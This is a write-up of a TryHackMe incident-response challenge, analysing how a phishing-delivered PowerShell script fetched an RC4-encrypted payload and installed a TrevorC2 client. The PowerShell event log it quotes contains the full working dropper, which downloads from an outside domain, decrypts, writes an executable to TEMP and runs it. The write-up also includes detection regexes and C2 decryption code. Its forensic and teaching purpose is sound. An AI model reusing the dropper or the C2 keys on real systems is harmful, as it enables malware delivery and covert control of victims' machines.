Masquerade (TryHackMe)

J
Software Developer | Learning Cybersecurity | Open for roles * If you're in the early stages of your career in software development (student or still looking for an entry-level role) and in need of mentorship, you can reach out to me.

Link to the challenge on TryHackMe: Masquerade

Scenario

Jim from the Finance department received an email that appeared to come from the company’s system administrator, asking him to run a script to “apply critical security updates.” Trusting the message, Jim executed the script on his workstation. Shortly after, unusual network traffic and system activity were observed. You have been provided with relevant artifacts to investigate what happened, determine the impact, and identify how the attacker established control over the system.

Important!: These artifacts contain real malware; however, the challenge can be completed entirely through static analysis, and there is no need to run or execute any of the files. Despite that, analysis should still be conducted in a controlled environment such as a lab machine (VM).

Challenge - Questions

Good Luck Detective!

Answer the questions below

What external domain was contacted during script execution? api-edgecloud.xyz

tshark -r traffic.pcapng -Y "http" -T fields -e http.host -e http.request.uri
Running as user "root" and group "root". This could be dangerous.
api-edgecloud.xyz	/amd.bin
	/amd.bin
34.174.57.99	/images?guid=c09Gc3pZOGRaOGF6MWo4bUNKM0tGUktFK2t2b3dOOEtQR2hhWUF0VVlhcUdwWjl4RGJHNXR1UnkyRzdOTXptdQ==
	/images?guid=c09Gc3pZOGRaOGF6MWo4bUNKM0tGUktFK2t2b3dOOEtQR2hhWUF0VVlhcUdwWjl4RGJHNXR1UnkyRzdOTXptdQ==
34.174.57.99	/
	/
34.174.57.99	/
	/
34.174.57.99	/
	/
34.174.57.99	/
	/
34.174.57.99	/
	/
34.174.57.99	/
	/
34.174.57.99	/
	/
34.174.57.99	/
	/
34.174.57.99	/
	/
34.174.57.99	/
	/
34.174.57.99	/images?guid=UVRNZUdTS0ozRzRaUGNlaGhLRUd0aXl2R3Zub2N2YW5UZTh3ZmorMEx1WXBPdEIvL1BSSzZ1RW5oN0EvMTIxRUJ3Z3NQZk5Yb2d0VUYxOTV0MFZ1SUZDZ1cwcnRHYzlCYlFLK1NzTWd1NVE9
	/images?guid=UVRNZUdTS0ozRzRaUGNlaGhLRUd0aXl2R3Zub2N2YW5UZTh3ZmorMEx1WXBPdEIvL1BSSzZ1RW5oN0EvMTIxRUJ3Z3NQZk5Yb2d0VUYxOTV0MFZ1SUZDZ1cwcnRHYzlCYlFLK1NzTWd1NVE9
34.174.57.99	/
	/
34.174.57.99	/
	/
34.174.57.99	/
	/
34.174.57.99	/
	/
34.174.57.99	/
	/
34.174.57.99	/
	/
34.174.57.99	/
	/

What encryption algorithm was used by the script? RC4

# Alternative: use evtx_dump
root@ip-10-82-96-17:~/attachments/dist# apt-get install -y libevtx-utils
root@ip-10-82-96-17:~/attachments/dist# evtxexport Powershell-Operational.evtx > evtx_dump.txt 2>/dev/null
root@ip-10-82-96-17:~/attachments/dist# grep -iE "AES|RSA|XOR|encrypt|cipher|key|crypto" evtx_dump.txt
    $byte -bxor $s[($s[$i] + $s[$j]) % 256]
  • The line $byte -bxor $s[($s[$i] + $s[$j]) % 256] is not just a plain XOR: the $s[$i] and $s[$j] lookups combined with the % 256 wrap-around are the RC4 keystream generation step (the PRGA, driven by the key-scheduled $s array). -bxor is PowerShell's bitwise XOR operator, which RC4 uses in its final step to combine the keystream with the data.

  • To confirm, look at the surrounding script: grep -A 10 -B 10 "bxor" evtx_dump.txt

  • You should see the full RC4 implementation: the key-scheduling initialisation of the array, the swap loop, and then the XOR step you already found.

  • RC4 is the actual algorithm. -bxor is just the XOR operation RC4 uses internally, but the complete construction with the $s array, the $i and $j indices and the % 256 modulo is the RC4 keystream cipher. XOR alone is too generic; RC4 is the specific encryption algorithm.

What key was used to decrypt the second-stage payload? X9vT3pL2QwE8xR6ZkYhC4s

What was the timestamp of the server response containing the payload? Fri, 10 Apr 2026 05:28:23 GMT

cat evtx_dump.txt
evtxexport 20181227

Event number			: 1
Written time			: Apr 10, 2026 05:28:02.222299600 UTC
Event level			: Information (4)
User security identifier	: S-1-5-21-753961636-1548247123-2641200033-1001
Computer name			: DESKTOP-I6C5C7M
Source name			: Microsoft-Windows-PowerShell
Event identifier		: 0x0000a001 (40961)
Number of strings		: 0

Event number			: 2
Written time			: Apr 10, 2026 05:28:02.405399100 UTC
Event level			: Information (4)
User security identifier	: S-1-5-21-753961636-1548247123-2641200033-1001
Computer name			: DESKTOP-I6C5C7M
Source name			: Microsoft-Windows-PowerShell
Event identifier		: 0x0000d100 (53504)
Number of strings		: 2
String: 1			: 4444
String: 2			: DefaultAppDomain

Event number			: 3
Written time			: Apr 10, 2026 05:28:03.356831600 UTC
Event level			: Information (4)
User security identifier	: S-1-5-21-753961636-1548247123-2641200033-1001
Computer name			: DESKTOP-I6C5C7M
Source name			: Microsoft-Windows-PowerShell
Event identifier		: 0x0000a002 (40962)
Number of strings		: 0

Event number			: 4
Written time			: Apr 10, 2026 05:28:03.405161500 UTC
Event level			: Verbose (5)
User security identifier	: S-1-5-21-753961636-1548247123-2641200033-1001
Computer name			: DESKTOP-I6C5C7M
Source name			: Microsoft-Windows-PowerShell
Event identifier		: 0x00001008 (4104)
Number of strings		: 5
String: 1			: 1
String: 2			: 1
String: 3			: prompt
String: 4			: b58dab54-1c3f-4703-89dc-ea18519d17e2
String: 5			: 

Event number			: 5
Written time			: Apr 10, 2026 05:28:23.175635500 UTC
Event level			: Verbose (5)
User security identifier	: S-1-5-21-753961636-1548247123-2641200033-1001
Computer name			: DESKTOP-I6C5C7M
Source name			: Microsoft-Windows-PowerShell
Event identifier		: 0x00001008 (4104)
Number of strings		: 5
String: 1			: 1
String: 2			: 1
String: 3			: .\updates.ps1
String: 4			: cd9ab053-2906-4173-9346-813b5561a628
String: 5			: 

Event number			: 6
Written time			: Apr 10, 2026 05:28:23.218530800 UTC
Event level			: Verbose (5)
User security identifier	: S-1-5-21-753961636-1548247123-2641200033-1001
Computer name			: DESKTOP-I6C5C7M
Source name			: Microsoft-Windows-PowerShell
Event identifier		: 0x00001008 (4104)
Number of strings		: 5
String: 1			: 1
String: 2			: 1
String: 3			: $k = [System.Text.Encoding]::UTF8.GetBytes(('X9vT3pL'+'2QwE'+'8xR6'+'ZkYhC4'+'s'))
$h = (New-Object System.Net.WebClient).DownloadString((-join('ht','tp','://','api-edg','e','cl','oud.xy','z/amd.bi','n'))) -replace ('\'+'s'),''
$b = for($x=0; $x -lt $h.Length; $x+=2) { [Convert]::ToByte($h.Substring($x, 2), 16) }

$s = 0..255
$j = 0
for ($i = 0; $i -lt 256; $i++) {
    $j = ($j + $s[$i] + $k[$i % $k.Count]) % 256
    $temp = $s[$i]; $s[$i] = $s[$j]; $s[$j] = $temp
}

$i = $j = 0
$d = foreach ($byte in $b) {
    $i = ($i + 1) % 256
    $j = ($j + $s[$i]) % 256
    $temp = $s[$i]; $s[$i] = $s[$j]; $s[$j] = $temp
    $byte -bxor $s[($s[$i] + $s[$j]) % 256]
}

$p = $env:TEMP + '\amdfendrsr.exe'
[System.IO.File]::WriteAllBytes($p, $d)
Start-Process $p
String: 4			: f3e51d8b-a580-40a4-ab12-4384c40ca729
String: 5			: C:\Users\jim\Downloads\updates.ps1

Event number			: 7
Written time			: Apr 10, 2026 05:28:23.590812900 UTC
Event level			: Verbose (5)
User security identifier	: S-1-5-21-753961636-1548247123-2641200033-1001
Computer name			: DESKTOP-I6C5C7M
Source name			: Microsoft-Windows-PowerShell
Event identifier		: 0x00001008 (4104)
Number of strings		: 5
String: 1			: 1
String: 2			: 1
String: 3			: prompt
String: 4			: 4ccbc8ff-078b-4ffa-a16f-81b8318bc995
String: 5			: 
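As an added triage example (my code, not part of the write-up or the TryHackMe room), the script below parses evtxexport output like the dump above, pulls the script text out of each Event ID 4104 record, flags the RC4 pattern, the string-splitting obfuscation and the download-and-run behaviour identified earlier, and folds the concatenated literals back into readable IoCs. The sample dump is a constructed cut-down of the events shown; the indicator names are mine.

```python
import re

# Constructed sample in evtxexport's text layout (trimmed from the dump above; event 5 is benign, 6 is the dropper).
SAMPLE_DUMP = """\
Event number\t\t\t: 5
Event identifier\t\t: 0x00001008 (4104)
String: 3\t\t\t: .\\updates.ps1

Event number\t\t\t: 6
Written time\t\t\t: Apr 10, 2026 05:28:23.218530800 UTC
Event identifier\t\t: 0x00001008 (4104)
String: 3\t\t\t: $k = [System.Text.Encoding]::UTF8.GetBytes(('X9vT3pL'+'2QwE'+'8xR6'+'ZkYhC4'+'s'))
$h = (New-Object System.Net.WebClient).DownloadString((-join('ht','tp','://','api-edg','e','cl','oud.xy','z/amd.bi','n')))
for ($i = 0; $i -lt 256; $i++) { $j = ($j + $s[$i] + $k[$i % $k.Count]) % 256 }
$byte -bxor $s[($s[$i] + $s[$j]) % 256]
Start-Process $p
String: 5\t\t\t: C:\\Users\\jim\\Downloads\\updates.ps1
"""

FIELD = re.compile(r'^(Event number|Written time|Event identifier|String: \d+)\t+: ?(.*)$')
INDICATORS = {  # behavioural markers of the dropper pattern discussed in this write-up
    'rc4_ksa': re.compile(r'\$\w+\[\$\w+\s*%\s*\$\w+\.Count\]\)\s*%\s*256'),
    'rc4_prga': re.compile(r'-bxor\s+\$\w+\[\(\$\w+\[\$\w+\]\s*\+\s*\$\w+\[\$\w+\]\)\s*%\s*256\]'),
    'split_strings': re.compile(r"'[^']*'\s*\+\s*'[^']*'|-join\s*\('"),
    'download': re.compile(r'Net\.WebClient|DownloadString|DownloadFile', re.I),
    'execute': re.compile(r'Start-Process|Invoke-Expression|\biex\b', re.I),
}

def parse_events(dump):
    """Turn evtxexport text into dicts; a 'String: N' value may span many lines."""
    events, cur, key = [], None, None
    for line in dump.splitlines():
        m = FIELD.match(line)
        if not m and cur is not None and key and key.startswith('String: '):
            cur['strings'][int(key[8:])] += '\n' + line  # continuation of script text
        elif m:
            key, val = m.groups()
            if key == 'Event number':
                cur = {'strings': {}}
                events.append(cur)
            elif key.startswith('String: '):
                cur['strings'][int(key[8:])] = val
            elif key == 'Event identifier':
                cur['event_id'] = int(re.search(r'\((\d+)\)', val).group(1))
            else:
                cur[key] = val
    return events

def fold_string_literals(script):
    """Collapse 'a'+'b' and -join('a','b') into one literal so IoCs read plainly."""
    def glue(text):
        return "'" + ''.join(re.findall(r"'([^']*)'", text)) + "'"
    script = re.sub(r"-join\s*\(\s*('[^']*'(?:\s*,\s*'[^']*')*)\s*\)",
                    lambda m: glue(m.group(1)), script)
    return re.sub(r"'[^']*'(?:\s*\+\s*'[^']*')+", lambda m: glue(m.group(0)), script)

def triage_script_blocks(dump):
    """One finding per Event ID 4104 block that trips any indicator."""
    findings = []
    for ev in parse_events(dump):
        raw = ev['strings'].get(3, '')
        hits = [name for name, rx in INDICATORS.items() if rx.search(raw)]
        if ev.get('event_id') == 4104 and hits:
            folded = fold_string_literals(raw)
            findings.append({'time': ev.get('Written time'), 'indicators': hits,
                             'path': ev['strings'].get(5, '').strip(),
                             'urls': re.findall(r"'(https?://[^']+)'", folded),
                             'keys': re.findall(r"GetBytes\(\('([^']+)'\)\)", folded)})
    return findings
```

Run it against the real evtx_dump.txt by reading the file into triage_script_blocks; the folded URL and key are the same values the questions above ask for.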

What is the SHA-256 hash of the extracted and decrypted payload? e3d39d42df63c6874780737244370ba517820f598fd2443e47ff6580f10c17cb

tshark -r traffic.pcapng -Y "http.response and ip.dst == $(tshark -r traffic.pcapng -Y 'http.request.uri contains "amd.bin"' -T fields -e ip.src | head -1)" --export-objects "http,./extracted" 2>/dev/null
Running as user "root" and group "root". This could be dangerous.
 1675 12.148159900 34.174.85.91 → 10.0.2.15    HTTP 1446 HTTP/1.0 200 OK 
 1685 12.610728600 34.174.57.99 → 10.0.2.15    HTTP 298 HTTP/1.1 200 OK 
 1773 12.815133500 34.174.57.99 → 10.0.2.15    HTTP 719 HTTP/1.1 200 OK  (text/html)
 2761 19.032387600 34.174.57.99 → 10.0.2.15    HTTP 719 HTTP/1.1 200 OK  (text/html)
 2866 27.233389300 34.174.57.99 → 10.0.2.15    HTTP 719 HTTP/1.1 200 OK  (text/html)
 2970 34.462369600 34.174.57.99 → 10.0.2.15    HTTP 719 HTTP/1.1 200 OK  (text/html)
 3139 42.662874300 34.174.57.99 → 10.0.2.15    HTTP 739 HTTP/1.1 200 OK  (text/html)
 3156 42.897708700 34.174.57.99 → 10.0.2.15    HTTP 251 HTTP/1.1 200 OK 
 3244 47.092506700 34.174.57.99 → 10.0.2.15    HTTP 719 HTTP/1.1 200 OK  (text/html)
 3331 55.314458600 34.174.57.99 → 10.0.2.15    HTTP 719 HTTP/1.1 200 OK  (text/html)
 3427 59.557171300 34.174.57.99 → 10.0.2.15    HTTP 763 HTTP/1.1 200 OK  (text/html)
 3438 59.688346400 34.174.57.99 → 10.0.2.15    HTTP 251 HTTP/1.1 200 OK 
 3528 66.890340700 34.174.57.99 → 10.0.2.15    HTTP 719 HTTP/1.1 200 OK  (text/html)
 3695 74.091819000 34.174.57.99 → 10.0.2.15    HTTP 803 HTTP/1.1 200 OK  (text/html)
 3705 74.197427900 34.174.57.99 → 10.0.2.15    HTTP 251 HTTP/1.1 200 OK 
 3793 78.420214300 34.174.57.99 → 10.0.2.15    HTTP 699 HTTP/1.1 200 OK  (text/html)
 3885 83.636218800 34.174.57.99 → 10.0.2.15    HTTP 719 HTTP/1.1 200 OK  (text/html)
 3970 89.830973600 34.174.57.99 → 10.0.2.15    HTTP 719 HTTP/1.1 200 OK  (text/html)
 4058 92.034540300 34.174.57.99 → 10.0.2.15    HTTP 719 HTTP/1.1 200 OK  (text/html)
 4150 95.266197400 34.174.57.99 → 10.0.2.15    HTTP 719 HTTP/1.1 200 OK  (text/html)
 4240 100.465999500 34.174.57.99 → 10.0.2.15    HTTP 719 HTTP/1.1 200 OK  (text/html)
 4336 104.656729400 34.174.57.99 → 10.0.2.15    HTTP 719 HTTP/1.1 200 OK  (text/html)
root@ip-10-82-96-17:~/attachments/dist# ls extracted/
 %2f      '%2f(10)'  '%2f(12)'  '%2f(14)'  '%2f(16)'  '%2f(3)'  '%2f(5)'  '%2f(7)'  '%2f(9)'
'%2f(1)'  '%2f(11)'  '%2f(13)'  '%2f(15)'  '%2f(2)'   '%2f(4)'  '%2f(6)'  '%2f(8)'   amd.bin
root@ip-10-82-96-17:~/attachments/dist# python3 - <<'EOF'
> key = b'X9vT3pL2QwE8xR6ZkYhC4s'
> 
> with open('extracted/amd.bin', 'r') as f:
>     hex_data = f.read().replace('\n','').replace('\r','').replace(' ','')
> 
> b = bytes.fromhex(hex_data)
> 
> s = list(range(256))
> j = 0
> for i in range(256):
>     j = (j + s[i] + key[i % len(key)]) % 256
>     s[i], s[j] = s[j], s[i]
> 
> i = j = 0
> d = []
> for byte in b:
>     i = (i + 1) % 256
>     j = (j + s[i]) % 256
>     s[i], s[j] = s[j], s[i]
>     d.append(byte ^ s[(s[i] + s[j]) % 256])
> 
> with open('decrypted.exe', 'wb') as f:
>     f.write(bytes(d))
> print("Decrypted successfully")
> EOF
Decrypted successfully
root@ip-10-82-96-17:~/attachments/dist# 
root@ip-10-82-96-17:~/attachments/dist# sha256sum decrypted.exe
e3d39d42df63c6874780737244370ba517820f598fd2443e47ff6580f10c17cb  decrypted.exe

file decrypted.exe
decrypted.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows

What remote URL did the client use to communicate with the victim machine? http://34.174.57.99

tshark -r traffic.pcapng -Y "ip.dst == 34.174.57.99 and http.request" -T fields -e http.request.full_uri | head -5
Running as user "root" and group "root". This could be dangerous.
http://34.174.57.99/images?guid=c09Gc3pZOGRaOGF6MWo4bUNKM0tGUktFK2t2b3dOOEtQR2hhWUF0VVlhcUdwWjl4RGJHNXR1UnkyRzdOTXptdQ==
http://34.174.57.99/
http://34.174.57.99/
http://34.174.57.99/
http://34.174.57.99/

Which encryption key and algorithm does the client use? M4squ3r4d3Th3P4ck3tSt34lthM0d31337, AES

strings -e l decrypted.exe | grep -vE "System|Windows|Microsoft|http|DESKTOP|Program|xmlns|assembly|requestedPrivileges"
-z/z3z_
M4squ3r4d3Th3P4ck3tSt34lthM0d31337
magic_hostname={0}
Accept-Encoding
identity
[*] Cannot connect to {0}
[*] Trying again in {0} seconds...
<!-- {0}
oldcss=
 --></body>
nothing
::::
cmd.exe
/Q /c {0} 2>&1
/images
guid=
oldcss=
M4squ3r4d3Th3P4ck3tSt34lthM0d31337
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
FileDescription
FileVersion
0.0.0.0
InternalName
LegalCopyright
OriginalFilename
ProductVersion
0.0.0.0
Assembly Version
0.0.0.0

After determining the client's encryption, decrypt the commands the attacker executed on the victim and submit the flag.

SHA-256 of M4squ3r4d3Th3P4ck3tSt34lthM0d31337 (used as the AES key): b5f253f95311e41930daa10fc6ca5823a404df428c45dd5b350fccf36a20e846

From the tshark output at the top of this write-up, the shortest guid parameter is this request:

34.174.57.99	/images?guid=UVRNZUdTS0ozRzRaUGNlaGhLRUd0aXl2R3Zub2N2YW5UZTh3ZmorMEx1WXBPdEIvL1BSSzZ1RW5oN0EvMTIxRUJ3Z3NQZk5Yb2d0VUYxOTV0MFZ1SUZDZ1cwcnRHYzlCYlFLK1NzTWd1NVE9
	/images?guid=UVRNZUdTS0ozRzRaUGNlaGhLRUd0aXl2R3Zub2N2YW5UZTh3ZmorMEx1WXBPdEIvL1BSSzZ1RW5oN0EvMTIxRUJ3Z3NQZk5Yb2d0VUYxOTV0MFZ1SUZDZ1cwcnRHYzlCYlFLK1NzTWd1NVE9
34.174.57.99	/

UVRNZUdTS0ozRzRaUGNlaGhLRUd0aXl2R3Zub2N2YW5UZTh3ZmorMEx1WXBPdEIvL1BSSzZ1RW5oN0EvMTIxRUJ3Z3NQZk5Yb2d0VUYxOTV0MFZ1SUZDZ1cwcnRHYzlCYlFLK1NzTWd1NVE9

CyberChef recipe: From Base64 → From Base64 → To Hex

41331e192289dc6e193dc7a184a106b62caf1af9e872f6a74def307e3fb42ee6293ad07ffcf44aeae12787b03fd76d4407082c3df357a20b54175f79b7456e2050a05b4aed19cf416d02be4ac320bb94

Final operation: AES Decrypt, applied to everything after the first 16 bytes (the IV):

2caf1af9e872f6a74def307e3fb42ee6293ad07ffcf44aeae12787b03fd76d4407082c3df357a20b54175f79b7456e2050a05b4aed19cf416d02be4ac320bb94

  • key: b5f253f95311e41930daa10fc6ca5823a404df428c45dd5b350fccf36a20e846

  • IV: 41331e192289dc6e193dc7a184a106b6 (Hex; the first 16 bytes of the decoded blob)

  • Mode: CBC

  • Input: Hex

  • Output: Raw

Conclusion

This challenge demonstrated a full covert command-and-control (C2) attack chain, from initial dropper delivery through to exfiltrated data hidden in plain sight across three layers of investigation.

Network layer — tshark filtering revealed suspicious HTTP traffic to api-edgecloud.xyz and repeated beaconing to 34.174.57.99 via /images?guid= URIs. The long Base64-encoded query parameters were the first hint that data was being tunneled over what looked like normal image requests.

Host layer — The PowerShell Operational event log (Event ID 4104) exposed the dropper script updates.ps1, which downloaded amd.bin from api-edgecloud.xyz, decrypted it using RC4 with hardcoded key X9vT3pL2QwE8xR6ZkYhC4s, wrote the result to %TEMP%\amdfendrsr.exe, and executed it.

Payload layer — Stripping strings from the decrypted PE identified it as a TrevorC2 client — an open-source C2 framework that hides commands and responses inside HTML comments, making traffic blend in with legitimate web responses.

Extracting the flag — With TrevorC2 identified, focus shifted to the shortest /images?guid= parameter in the pcap, which was likely carrying command output rather than a long beacon payload. Decoding it in CyberChef via From Base64 → From Base64 → To Hex split the blob into two components:

  • IV (first 16 bytes): 41331e192289dc6e193dc7a184a106b6

  • Ciphertext: 2caf1af9e872f6a74def307e3fb42ee6293ad07ffcf44aeae12787b03fd76d4407082c3df357a20b54175f79b7456e2050a05b4aed19cf416d02be4ac320bb94

The AES key was derived by SHA256-hashing the hardcoded string M4squ3r4d3Th3P4ck3tSt34lthM0d31337 found in the binary strings output, producing:

b5f253f95311e41930daa10fc6ca5823a404df428c45dd5b350fccf36a20e846

The final CyberChef operation — AES Decrypt with the key and IV above, Mode CBC, Input Hex, Output Raw — decrypted the payload to:

DESKTOP-I6C5C7M::::THM{m45k3d_tr4ff1c_0v3r_c0v3rt_ch4nn3lz}

The :::: delimiter is TrevorC2's characteristic output format, prefixing responses with the victim machine name before the command result. The flag was exfiltrated command output, hidden inside what appeared to be a routine image request.
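To reproduce the CyberChef steps from the question above and this flag-extraction walkthrough in code, here is an added Python example (mine, not from the write-up or from the TrevorC2 project): it undoes the double Base64, splits the IV off the blob, derives the AES key the way described above, strips the padding and parses the :::: delimiter. The guid value and key string are the ones quoted on this page; the AES step assumes pycryptodome is installed, everything else is standard library.

```python
import base64
import hashlib

# Constructed inputs, both quoted in this write-up: the shortest guid parameter
# from the capture and the key string recovered from the binary.
GUID_PARAM = "UVRNZUdTS0ozRzRaUGNlaGhLRUd0aXl2R3Zub2N2YW5UZTh3ZmorMEx1WXBPdEIvL1BSSzZ1RW5oN0EvMTIxRUJ3Z3NQZk5Yb2d0VUYxOTV0MFZ1SUZDZ1cwcnRHYzlCYlFLK1NzTWd1NVE9"
KEY_STRING = "M4squ3r4d3Th3P4ck3tSt34lthM0d31337"


def derive_key(key_string):
    """Key derivation as described above: SHA-256 digest of the string, used as the AES-256 key."""
    return hashlib.sha256(key_string.encode("utf-8")).digest()


def split_guid(guid_param):
    """Undo the double Base64 and split the 16-byte IV off the front of the blob."""
    blob = base64.b64decode(base64.b64decode(guid_param))
    if len(blob) < 32 or (len(blob) - 16) % 16:
        raise ValueError("not IV + whole AES blocks: %d bytes" % len(blob))
    return blob[:16], blob[16:]


def strip_pkcs7(data):
    """Remove PKCS#7 padding, rejecting a malformed trailer instead of guessing."""
    pad = data[-1]
    if not 1 <= pad <= 16 or data[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad PKCS#7 padding")
    return data[:-pad]


def parse_c2_output(plaintext):
    """Split the '<hostname>::::<command output>' format seen in the decrypted text."""
    host, sep, output = plaintext.partition("::::")
    if not sep:
        raise ValueError("missing :::: delimiter")
    return host, output


def decrypt_guid(guid_param, key_string):
    """AES-256-CBC decrypt of one guid value; assumes pycryptodome is installed."""
    from Crypto.Cipher import AES  # pip install pycryptodome
    iv, ct = split_guid(guid_param)
    cipher = AES.new(derive_key(key_string), AES.MODE_CBC, iv)
    return parse_c2_output(strip_pkcs7(cipher.decrypt(ct)).decode("utf-8", "replace"))


if __name__ == "__main__":
    iv, ct = split_guid(GUID_PARAM)
    print("IV        :", iv.hex())
    print("ciphertext:", ct.hex())
    try:
        print("host, output:", decrypt_guid(GUID_PARAM, KEY_STRING))
    except ImportError:
        print("install pycryptodome to run the AES step")
```

The same functions can be looped over every /images?guid= value in the capture to recover each beacon and response, not only the one carrying the flag.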

Flag: THM{m45k3d_tr4ff1c_0v3r_c0v3rt_ch4nn3lz}

Key takeaways:

  • Long Base64 query parameters in image URIs should raise immediate suspicion — they are a common covert channel technique.

  • PowerShell Script Block Logging (Event ID 4104) is invaluable for recovering attacker code even when the original script file is deleted.

  • Recognising the RC4 pattern in PowerShell ($s array + % 256 + -bxor) is a reliable indicator of encrypted dropper payloads.

  • Knowing common C2 frameworks by their binary strings and traffic patterns (TrevorC2's HTML comment wrapping, :::: delimiter) significantly accelerates triage.

CWE references: CWE-311 (Missing Encryption of Sensitive Data), CWE-506 (Embedded Malicious Code), CWE-319 (Cleartext Transmission of Sensitive Information).